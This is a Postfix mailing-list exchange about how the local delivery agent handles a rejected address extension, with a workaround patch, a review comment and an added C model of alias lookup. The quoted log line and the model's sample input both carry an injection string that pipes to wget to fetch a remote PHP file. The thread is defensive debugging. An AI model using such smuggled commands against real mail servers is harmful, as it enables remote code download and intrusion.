On 22.04.2010 14:47, Wietse Venema wrote:
> Arno Schäfer:
>> Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address
>> with illegal extension: root+:|wget http://fortunes.in/x1x.php
>
> You didn't mention in the initial report that Postfix rejected the
> extension, because that makes all the difference in the world.
Yes. I should have looked up the mail.log right away, sorry about that.

> Apparently, the Postfix local delivery agent does not distinguish
> between "there is no address extension" and "there is an address
> extension, but it is invalid". In both cases, it only runs the
> full address local-part through the alias mapping.

OK, so if I understand that correctly: if the extension is valid, the local delivery agent checks whether there is an alias for the address WITH the extension and, if not, falls back to the alias WITHOUT the extension. But if the extension is invalid, it does not realize that, looks for an alias with the invalid extension, does not find one, and then decides to attempt local delivery.

Just to be sure: why then is the mail delivered to root rather than rejected? That would mean that the local delivery agent, AFTER deciding to deliver locally, checks in another part of the code again for an extension in the full address local-part and in that case handles it correctly, right?

In any case, I understand that this is not a security issue, so that is certainly the most important thing.

Best Regards,
Arno

> Again, this has nothing to do with "|" characters in address
> extensions.
>
> 	Wietse
>
> The workaround is to replace the broken extension by the string
> "invalid". It would be incorrect to remove the evidence of the
> attack by patching the full address local-part, and it would take
> too much time to change the code to distinguish between "there is
> no address extension" and "there is an address extension, but it
> is invalid".
>
> *** ./recipient.c-	Sat Feb 6 09:31:55 2010
> --- ./recipient.c	Thu Apr 22 08:35:33 2010
> ***************
> *** 258,264 ****
>       if (state.msg_attr.extension && strchr(state.msg_attr.extension, '/')) {
>           msg_warn("%s: address with illegal extension: %s",
>                    state.msg_attr.queue_id, state.msg_attr.local);
> !         state.msg_attr.extension = 0;
>       }
>   } else
>       state.msg_attr.extension = 0;
> --- 258,264 ----
>       if (state.msg_attr.extension && strchr(state.msg_attr.extension, '/')) {
>           msg_warn("%s: address with illegal extension: %s",
>                    state.msg_attr.queue_id, state.msg_attr.local);
> !         state.msg_attr.extension = "invalid";
>       }
>   } else
>       state.msg_attr.extension = 0;

-- 
Arno Schäfer
IT Consulting & Software Development
PHP - Java - Web Applications
Linux/Unix - MySQL - High Availability - Security
Weilbornstraße 10 - 63303 Dreieich
mailto: arno_schae...@gmx.de
Tel. +49-6103-699967 | Mobile +49-171-7939236
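Review bot: the changed line stores a pointer to the string literal "invalid" in state.msg_attr.extension, whereas before this hunk the field held either 0 or a pointer into the split local-part; please confirm that nothing later in the delivery path writes through or frees the extension pointer, and add a comment next to the assignment stating that "invalid" is a sentinel meaning "an extension was present but rejected", since the only reason the value is non-zero is to keep the fall-back to the unextended alias alive while msg_warn() above still logs the untouched state.msg_attr.local as evidence. The check itself is unchanged and only rejects extensions containing '/', which is consistent with the statement in the reply that the '|' character is not the issue here.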
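The alias-lookup order described in the exchange above, as an added model written for this page, not Postfix's own code. It assumes a recipient_delimiter of '+', the '/' test from the quoted hunk, an alias lookup that tries the full local-part first and the unextended user only when an extension is present, and (an assumption the thread does not settle) that an alias miss falls through to mailbox delivery for the unextended user. The alias table and inputs are constructed; the last input is the local-part from the log line quoted at the top of the message.

```c
#include <stdio.h>
#include <string.h>

#define RECIPIENT_DELIMITER '+'   /* assumed recipient_delimiter setting */

struct alias {
    const char *name;
    const char *target;
};

/* Constructed alias table for the example, not a real aliases file. */
static const struct alias aliases[] = {
    {"root",         "admin@example.com"},
    {"root+billing", "billing@example.com"},
};

static const char *alias_lookup(const char *key)
{
    size_t i;

    for (i = 0; i < sizeof(aliases) / sizeof(aliases[0]); i++)
        if (strcmp(aliases[i].name, key) == 0)
            return aliases[i].target;
    return NULL;
}

/*
 * Resolve one local-part. 'patched' selects the behaviour before the hunk
 * (extension dropped, i.e. set to 0) or after it (extension replaced by the
 * sentinel "invalid"). Returns "alias:<target>" or "local:<user>" in a
 * static buffer, which keeps the example easy to call but is not reentrant.
 */
const char *resolve_local(const char *local, int patched)
{
    static char out[512];
    char user[256];
    char *delim;
    const char *extension = NULL;
    const char *target;

    /* Split "user+extension" into its parts; 'local' itself is left untouched. */
    snprintf(user, sizeof(user), "%s", local);
    if ((delim = strchr(user, RECIPIENT_DELIMITER)) != NULL) {
        *delim = '\0';
        extension = delim + 1;
    }

    /* The '/' check from the quoted hunk. The warning carries the untouched
     * full local-part, so the evidence stays in the log either way. */
    if (extension != NULL && strchr(extension, '/') != NULL) {
        fprintf(stderr, "warning: address with illegal extension: %s\n", local);
        extension = patched ? "invalid" : NULL;
    }

    /* Assumed lookup order: full local-part first, then the unextended user,
     * but only when an extension is present. With the extension set to 0 the
     * second lookup is skipped, so "root+<bad>" never reaches the root alias. */
    target = alias_lookup(local);
    if (target == NULL && extension != NULL)
        target = alias_lookup(user);

    if (target != NULL)
        snprintf(out, sizeof(out), "alias:%s", target);
    else
        /* Assumption: on an alias miss, mailbox delivery uses the unextended user. */
        snprintf(out, sizeof(out), "local:%s", user);
    return out;
}

int main(void)
{
    /* Constructed inputs; the last is the local-part from the thread's log line. */
    static const char *const samples[] = {
        "root",
        "root+billing",
        "root+foo",
        "root+:|wget http://fortunes.in/x1x.php",
    };
    size_t i;

    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        printf("%-40s  before: %s\n", samples[i], resolve_local(samples[i], 0));
        printf("%-40s  after:  %s\n", "", resolve_local(samples[i], 1));
    }
    return 0;
}
```

Run as is, the attack-string input resolves to "local:root" under the old behaviour (the rejected extension is dropped, so the fall-back lookup for "root" never happens) and to "alias:admin@example.com" with the sentinel in place, which is the whole effect the workaround is meant to have.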